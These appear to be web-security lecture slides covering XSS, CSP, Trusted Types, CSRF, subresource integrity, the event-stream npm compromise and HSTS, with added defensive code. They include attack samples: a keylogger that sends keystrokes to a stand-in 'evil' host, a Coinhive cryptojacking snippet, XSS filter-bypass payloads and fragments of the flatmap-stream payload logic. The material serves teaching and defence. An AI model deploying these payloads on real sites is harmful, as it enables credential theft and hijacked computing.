Masters in Information Security
OWASP Top 10
Most frequently occurring: cross-site scripting (XSS)
[Diagram: stored XSS. Attacker: "Post Data with malicious code" → server: "Store". Victim: "Open App" → "Fetch" → "Get malicious code" → "Check".]
[Diagram: reflected XSS. Victim: "Request with payload" → "Page with payload"; "Request unrelated page" → "Page with malicious code".]
.../search.php?q=something<script>alert(1)</script>...
...<h1>Search for something<script>alert(1)</script>...
[Diagram: the attacker makes the user follow a link ("Follow link"); the server's "Response" reflects the payload back into the page.]
// DOM-based XSS: the "user" query parameter is written into the page as markup
var url = new URL(location.href).searchParams.get("user");
$('#form').append('<input type="hidden" value="' + url + '">');
<form id="form">
<input type="hidden"
value="https://example.com"/><script>alert(1)</script>
</form>
.../?user=https://example.com"/><script>alert(1)</script>...
// Keylogger payload: records every keypress and exfiltrates the buffer once a second via an image request
var keys = '';
document.onkeypress = function(e) {
e = window.event ? event : e;
var key = e.keyCode ? e.keyCode : e.charCode;
key = String.fromCharCode(key);
keys += key;
}
window.setInterval(function(){
new Image().src = 'http://evil.../log.php?c=' + keys;
keys = '';
}, 1000);
<!-- Cryptojacking payload: runs the Coinhive miner in the victim's browser -->
<script src="https://coinhive.com/lib/coinhive.min.js">
</script>
<script>
var miner = new CoinHive.User('SITE_KEY', 'john-doe');
miner.start();
</script>
// Blacklist filter: case-sensitive, strips only the literal token "script"
$save_text = str_replace('script', 'span', $text);
// Bypasses: mixed case, and handlers or URLs that never contain "script"
<ScRiPt>/* bad code here*/ </ScRiPt>
<input type="image" src="javascript:/* ... */;">
<img src="no.png" onerror="/* bad code here */">
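The DOM XSS sink from the `$('#form').append(...)` slide and the `str_replace('script', 'span', ...)` filter above, side by side with two fixes, as an added example (not code from the slides). It runs in Node; `addHiddenInput` takes a document-like object so it can be exercised without a browser, and the payloads are constructed here.

```javascript
// Added example (not from the slides): the vulnerable sink beside two fixes,
// plus a JavaScript twin of the PHP str_replace filter to show why filtering
// is not a defence. Payloads are constructed, not captured data.

// Vulnerable: untrusted input is concatenated into markup, so a value such as
//   x"/><script>alert(1)</script>
// closes the value attribute and adds a script element, as on the slide.
function hiddenInputUnsafe(user) {
  return '<input type="hidden" value="' + user + '">';
}

// Twin of  str_replace('script', 'span', $text): case-sensitive, one token.
function naiveFilter(text) {
  return text.split('script').join('span');
}

// Fix 1: contextual output encoding. Every character that can change the
// HTML parser's state becomes an entity, so the value can neither end the
// attribute nor start a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function hiddenInputEscaped(user) {
  return '<input type="hidden" value="' + escapeHtml(user) + '">';
}

// Fix 2: build the node with DOM APIs. `value` is a property, never parsed
// markup. In a browser: addHiddenInput(document.getElementById('form'), document, user)
function addHiddenInput(form, doc, user) {
  const input = doc.createElement('input');
  input.type = 'hidden';
  input.value = user;          // stored as data, never parsed as HTML
  form.appendChild(input);
  return input;
}

// Did the rendered markup escape the value attribute? For the template
// above, the first raw quote after value=" must be the one that ends the tag.
function breaksOut(html) {
  const start = html.indexOf('value="') + 'value="'.length;
  const end = html.indexOf('"', start);
  return html.slice(end) !== '">';
}

const PAYLOADS = {
  script: 'x"/><script>alert(1)</script>',
  mixedCase: 'x"/><ScRiPt>alert(1)</ScRiPt>',              // defeats the case-sensitive filter
  handler: 'x"/><img src="no.png" onerror="alert(1)">',   // no "script" token at all
};

// For each payload: does the value break out of the attribute when rendered
// unsafely, after the filter, and after encoding?
function demo() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    out[name] = {
      unsafe: breaksOut(hiddenInputUnsafe(p)),                 // true
      filtered: breaksOut(hiddenInputUnsafe(naiveFilter(p))),  // true: the filter never closes the hole
      escaped: breaksOut(hiddenInputEscaped(p)),               // false
    };
  }
  return out;
}
```

The filter only rewrites one spelling of one token, so the mixed-case and `onerror` payloads pass through untouched, and even the payload it does rewrite still closes the attribute and injects a `<span>` element. Encoding for the HTML attribute context, or skipping string building altogether and setting `input.value`, removes the hole for every input.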
[Diagram: where the scripts on a page come from: inline code, API, CDN, analytics, 3rd party, and an injected script. A Content Security Policy decides which of these sources may run.]
Content-Security-Policy-Report-Only:
default-src https: 'unsafe-inline' 'unsafe-eval';
report-uri https://csp-violation-report-endpoint/
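To see what the report-only policy above would and would not flag, here is a simplified evaluator for CSP fetch directives, added as an example (not code from the slides or from any browser). The hosts app.example.com, cdn.example.com and attacker.invalid are assumed; nonces, hashes, path matching and port wildcards are left out.

```javascript
// Added example (not from the slides): a simplified evaluator for the fetch
// directives of a Content-Security-Policy header. Simplifications: no
// nonces/hashes, no path matching, no port wildcards. Hosts are assumed.

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources.map((s) => s.toLowerCase());
  }
  return policy;
}

// Does one source expression match the URL being loaded?
function sourceMatches(source, url, pageOrigin) {
  if (source === "'none'") return false;
  if (source === "'self'") return url.origin === pageOrigin;
  if (source === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return url.protocol === source; // scheme source, e.g. https:
  let host = source;
  const m = source.match(/^([a-z][a-z0-9+.-]*:)\/\/(.*)$/);
  if (m) {
    if (url.protocol !== m[1]) return false;   // explicit scheme must match
    host = m[2];
  }
  host = host.split('/')[0];                   // drop any path part
  if (host.startsWith('*.')) return url.hostname.endsWith(host.slice(1));
  return url.host === host;
}

// Is a load (or an inline script) allowed? Falls back to default-src.
// Note: 'unsafe-inline' is the only thing that permits inline script here;
// in real browsers a nonce or hash in the same directive disables it.
function allows(policy, directive, { url, inline = false, pageOrigin }) {
  const sources = policy[directive] || policy['default-src'];
  if (!sources) return true;                   // nothing governs this load
  if (inline) return sources.includes("'unsafe-inline'");
  const u = new URL(url);
  return sources.some((s) => sourceMatches(s, u, pageOrigin));
}

// The slide's report-only policy versus a restrictive one.
const REPORT_ONLY = "default-src https: 'unsafe-inline' 'unsafe-eval'";
const STRICT = "default-src 'self'; script-src 'self' https://cdn.example.com; img-src 'self'; report-uri /csp-report";
const PAGE = 'https://app.example.com';

// Loads a page might see: the CDN script, an injected script, and the
// keylogger's beacon  new Image().src = 'http://.../log.php?c=' + keys
function evaluate(header) {
  const p = parseCsp(header);
  return {
    inlineScript: allows(p, 'script-src', { inline: true, pageOrigin: PAGE }),
    cdnScript: allows(p, 'script-src', { url: 'https://cdn.example.com/1.8/jquery.js', pageOrigin: PAGE }),
    anyHttpsScript: allows(p, 'script-src', { url: 'https://attacker.invalid/m.js', pageOrigin: PAGE }),
    httpBeacon: allows(p, 'img-src', { url: 'http://attacker.invalid/log.php?c=abc', pageOrigin: PAGE }),
    httpsBeacon: allows(p, 'img-src', { url: 'https://attacker.invalid/log.php?c=abc', pageOrigin: PAGE }),
  };
}
```

Against `REPORT_ONLY`, the only thing that trips is the plaintext `http://` beacon; inline script, any HTTPS script and an HTTPS beacon all pass, so this policy is a starting point for collecting reports rather than a defence. `STRICT` rejects the inline script, the foreign script and both beacons while still allowing the CDN copy of jquery.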
$('#form').append('...some STRING');
el.innerHTML='...some STRING'
el.innerHTML = { toString: () => 'hello' }
el.innerHTML // "hello"
Content-Security-Policy: require-trusted-types-for 'script'; trusted-types myPolicy
el.innerHTML = location.hash.slice(1); //string
//create via a TrustedTypes policy
el.innerHTML = aTrustedHTML;
Content-Security-Policy: require-trusted-types-for 'script'; trusted-types *
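A miniature model of the Trusted Types enforcement just described, added as an example (not the browser's implementation and not code from the slides). It shows why the `{ toString: () => 'hello' }` trick on the earlier slide is stopped: an enforcing sink checks the type of the value, not the string it produces. The policy name `myPolicy` comes from the slide; the escaping rule inside the policy is an assumption.

```javascript
// Added example (not from the slides, not the browser's own code): a model of
// Trusted Types. `allowedNames` mirrors the CSP `trusted-types` directive
// (an array of names, or '*'); makeElement mirrors a sink under
// `require-trusted-types-for 'script'`.

class TrustedHTML {
  constructor(html) { this.html = String(html); }
  toString() { return this.html; }
}

// Stand-in for window.trustedTypes.
function makeTrustedTypes(allowedNames) {
  const names = new Set();
  return {
    createPolicy(name, rules) {
      if (allowedNames !== '*' && !allowedNames.includes(name)) {
        throw new TypeError(`Policy "${name}" disallowed by CSP trusted-types directive`);
      }
      if (names.has(name)) throw new TypeError(`Policy "${name}" already exists`);
      names.add(name);
      return {
        name,
        createHTML(input) {
          if (typeof rules.createHTML !== 'function') throw new TypeError('policy has no createHTML');
          return new TrustedHTML(rules.createHTML(String(input)));   // the one place untrusted text becomes TrustedHTML
        },
      };
    },
    isHTML: (v) => v instanceof TrustedHTML,
  };
}

// An element whose innerHTML setter rejects strings and anything that merely
// stringifies; only a TrustedHTML instance is accepted.
function makeElement(trustedTypes) {
  let html = '';
  return {
    set innerHTML(v) {
      if (!trustedTypes.isHTML(v)) throw new TypeError("This document requires 'TrustedHTML' assignment.");
      html = String(v);
    },
    get innerHTML() { return html; },
  };
}

// Assumed policy rule: escape markup characters. Because only createHTML can
// mint TrustedHTML, this function is the whole review surface.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function demo() {
  const tt = makeTrustedTypes(['myPolicy']);       // trusted-types myPolicy
  const el = makeElement(tt);
  const results = {};
  try { el.innerHTML = '<img src=x onerror=alert(1)>'; results.plainString = 'assigned'; }
  catch (e) { results.plainString = 'blocked'; }
  try { el.innerHTML = { toString: () => 'hello' }; results.toStringObject = 'assigned'; }
  catch (e) { results.toStringObject = 'blocked'; }
  const policy = tt.createPolicy('myPolicy', { createHTML: escapeHtml });
  el.innerHTML = policy.createHTML('<img src=x onerror=alert(1)>');
  results.viaPolicy = el.innerHTML;                 // escaped markup, not an element
  try { tt.createPolicy('other', { createHTML: (s) => s }); results.otherPolicy = 'created'; }
  catch (e) { results.otherPolicy = 'blocked'; }    // name not in the directive
  return results;
}
```

With `trusted-types *` any policy name is accepted, including one whose `createHTML` is an identity function, which silently reintroduces the original sink; the named allow-list keeps the set of policies to review small.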
[Diagram: CSRF. The user logs in ("login"), then performs an "action" ("done"); a forged request from another site performs a "bad action" with the same cookies, and the server likewise answers "done!".]
eBay: "The password cannot be updated by using this method. However, the information that's needed to reset the password can."
[Diagram: CSRF with a synchroniser token. The user logs in and the page carries "Token: ...". A legitimate "action" sends the token, the server compares it ("==") and answers "done". The forged "bad action" carries no matching token ("!= ..."), so the server answers "NO ACCESS!".]
[Diagram: the page loads https:// .../1.8/jquery.js from a CDN; the CDN may serve a modified jquery.js* instead.]
<!-- integrity plus crossorigin: the browser hashes the fetched file and refuses to run it on mismatch -->
<script src="http://.../1.8/jquery.js"
integrity="sha384-DegqqxuZuCnJ...38EidfneOW/An5kgufFFTa"
crossorigin="anonymous">
</script>
<!-- integrity without crossorigin: a cross-origin response is opaque, cannot be checked, and is blocked -->
<script src="http://.../1.8/jquery.js"
integrity="sha384-DegqqxuZuCnJ...38EidfneOW/An5kgufFFTa">
</script>
<!-- no integrity: whatever the CDN serves is executed -->
<script src="http://.../1.8/jquery.js">
</script>
sha(jquery.js) != sha(jquery.js*)
[Diagram: event-stream versions v3.3.5, v3.3.6 (published by right9ctrl) and v4.0.0, and flatmap-stream versions v0.1.0 and v0.1.1, the dependency added to event-stream v3.3.6 that carried the malicious code.]
// Simplified on the slide: the flatmap-stream v0.1.1 payload decrypted its next stage with AES-256, keyed on the npm_package_description of the package being built
require("crypto").decrypt("aes256", data, npm_package_description);
[Diagram: the key matches only in the targeted application, copay-dash]
// the payload runs only under a release build script
if(!/build\:.*\-release/.test(process.argv[2])) return;
npm run-script command
"build:ios-release": "run-s env:prod && ionic cordova build ios --release"
inject malicious payload to steal private keys from wallet
[Diagram: npm audit reports flatmap-stream v0.1.1 inside the event-stream dependency tree.]
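A lockfile scan that finds where a known-bad version sits in a dependency tree, which is the check `npm audit` performs against the advisory database, added as an example (not code from the slides or from npm). The lockfiles are constructed with the chain from the incident above; the bad-version table holds only the version named on the slide, where a real scan would read an advisory feed.

```javascript
// Added example (not from the slides, not npm's own code): locate a known-bad
// package version in an npm lockfile. Lockfile contents are constructed.

const BAD = { 'flatmap-stream': ['0.1.1'] };   // from the slide; a real scan reads an advisory feed

// Walk an npm lockfile. Supports lockfileVersion 1 (nested "dependencies")
// and 2/3 (flat "packages" keyed by node_modules path).
function findBadVersions(lock, bad = BAD) {
  const hits = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (!path) continue;                               // "" is the root project
      const name = path.split('node_modules/').pop();    // last path segment, scopes included
      if ((bad[name] || []).includes(meta.version)) hits.push({ name, version: meta.version, path });
    }
    return hits;
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const here = [...trail, `${name}@${meta.version}`];
      if ((bad[name] || []).includes(meta.version)) {
        hits.push({ name, version: meta.version, path: here.join(' > ') });
      }
      walk(meta.dependencies, here);                     // nested (deduped) dependencies
    }
  };
  walk(lock.dependencies, [lock.name || 'root']);
  return hits;
}

// Constructed lockfile in the version-1 shape: the bad version sits one level
// down, pulled in by event-stream, while another library holds the clean one.
const LOCK_V1 = {
  name: 'copay-dash', lockfileVersion: 1,
  dependencies: {
    'event-stream': { version: '3.3.6', dependencies: { 'flatmap-stream': { version: '0.1.1' } } },
    'some-other-lib': { version: '2.0.0', dependencies: { 'flatmap-stream': { version: '0.1.0' } } },
  },
};

// The same tree in the version-2 shape.
const LOCK_V2 = {
  name: 'copay-dash', lockfileVersion: 2,
  packages: {
    '': { name: 'copay-dash', version: '1.0.0' },
    'node_modules/event-stream': { version: '3.3.6' },
    'node_modules/event-stream/node_modules/flatmap-stream': { version: '0.1.1' },
    'node_modules/flatmap-stream': { version: '0.1.0' },
    'node_modules/some-other-lib': { version: '2.0.0' },
  },
};
```

The transitive placement is the point: `copay-dash` never asked for flatmap-stream, so only the resolved tree in the lockfile, not `package.json`, reveals that the release build would load it. Pinning via the lockfile and re-running the scan on every dependency update is what turns this into a gate.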
[Diagram: normal flow. request HTTP page → redirect to HTTPS → request HTTPS page → HTTPS response.]
95% of HTTPS servers vulnerable to trivial MITM attack
[Diagram: SSL stripping. The user's "request HTTP page" reaches a man in the middle, who performs the "redirect to HTTPS" / "request HTTPS page" / "HTTPS response" exchange with the server himself and returns a plain "HTTP response" to the user (HTTPS → HTTP). The user's "login" then travels over HTTP; the attacker steals the credentials, forwards the "login HTTPS" to the server and relays the "HTTPS response" back as an "HTTP response".]
[Diagram: with HSTS. request HTTP page → redirect to HTTPS → request HTTPS page → HTTPS response with Strict-Transport-Security header. Another day: user requests HTTP page ...]
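The browser side of HSTS as a small model, added as an example (not code from the slides or from any browser). `parseHsts` reads the Strict-Transport-Security header and `HstsStore` is the per-host cache that, on "another day", rewrites an http:// request to https:// before anything leaves the machine, which is what removes the attacker's window in the diagram. The host names bank.example and other.example are assumed.

```javascript
// Added example (not from the slides, not browser code): a model of the HSTS
// cache. Host names are constructed.

// Parse "max-age=31536000; includeSubDomains; preload". Returns null when
// max-age is missing or malformed, in which case the header is ignored.
function parseHsts(headerValue) {
  const out = { maxAge: null, includeSubDomains: false, preload: false };
  for (const raw of headerValue.split(';')) {
    const [k, v] = raw.trim().split('=').map((s) => s && s.trim().replace(/^"|"$/g, ''));
    const key = (k || '').toLowerCase();
    if (key === 'max-age' && /^\d+$/.test(v || '')) out.maxAge = Number(v);
    else if (key === 'includesubdomains') out.includeSubDomains = true;
    else if (key === 'preload') out.preload = true;
  }
  return out.maxAge === null ? null : out;
}

class HstsStore {
  constructor() { this.entries = new Map(); }   // host -> { expires, includeSubDomains }

  // Only headers received over a secure connection count; one seen over plain
  // HTTP could have been injected by the attacker in the diagram.
  record(host, headerValue, now, overSecureTransport) {
    if (!overSecureTransport) return false;
    const h = parseHsts(headerValue);
    if (!h) return false;
    if (h.maxAge === 0) { this.entries.delete(host); return true; }   // max-age=0 revokes
    this.entries.set(host, { expires: now + h.maxAge * 1000, includeSubDomains: h.includeSubDomains });
    return true;
  }

  // Rewrite an http:// URL to https:// if the host, or a parent domain whose
  // entry has includeSubDomains, has an unexpired entry. Otherwise unchanged.
  upgrade(urlString, now) {
    const url = new URL(urlString);
    if (url.protocol !== 'http:') return urlString;
    const labels = url.hostname.split('.');
    for (let i = 0; i < labels.length; i++) {
      const domain = labels.slice(i).join('.');
      const e = this.entries.get(domain);
      if (!e) continue;
      if (e.expires <= now) { this.entries.delete(domain); continue; }   // lazily expire
      if (i === 0 || e.includeSubDomains) {
        url.protocol = 'https:';
        return url.toString();
      }
    }
    return urlString;
  }
}

// The diagram's sequence: day one, then "another day".
function demo() {
  const store = new HstsStore();
  const day1 = 0;
  const dayLater = day1 + 24 * 3600 * 1000;
  const steps = {};
  steps.firstHttp = store.upgrade('http://bank.example/login', day1);   // unchanged: nothing cached yet
  // the HTTPS response reached after the redirect carries the header
  store.record('bank.example', 'max-age=31536000; includeSubDomains', day1, true);
  steps.nextDay = store.upgrade('http://bank.example/login', dayLater);      // rewritten to https://
  steps.subdomain = store.upgrade('http://www.bank.example/', dayLater);     // covered by includeSubDomains
  steps.otherHost = store.upgrade('http://other.example/', dayLater);        // unchanged
  steps.expired = store.upgrade('http://bank.example/login', day1 + 31536000 * 1000 + 1); // entry lapsed
  return steps;
}
```

The very first plaintext request is still exposed, which is why `firstHttp` is not rewritten; the `preload` token exists so that a host can be shipped in the browser's built-in list and close that gap too. A long `max-age` matters because the protection lapses as soon as the entry expires, as the last step shows.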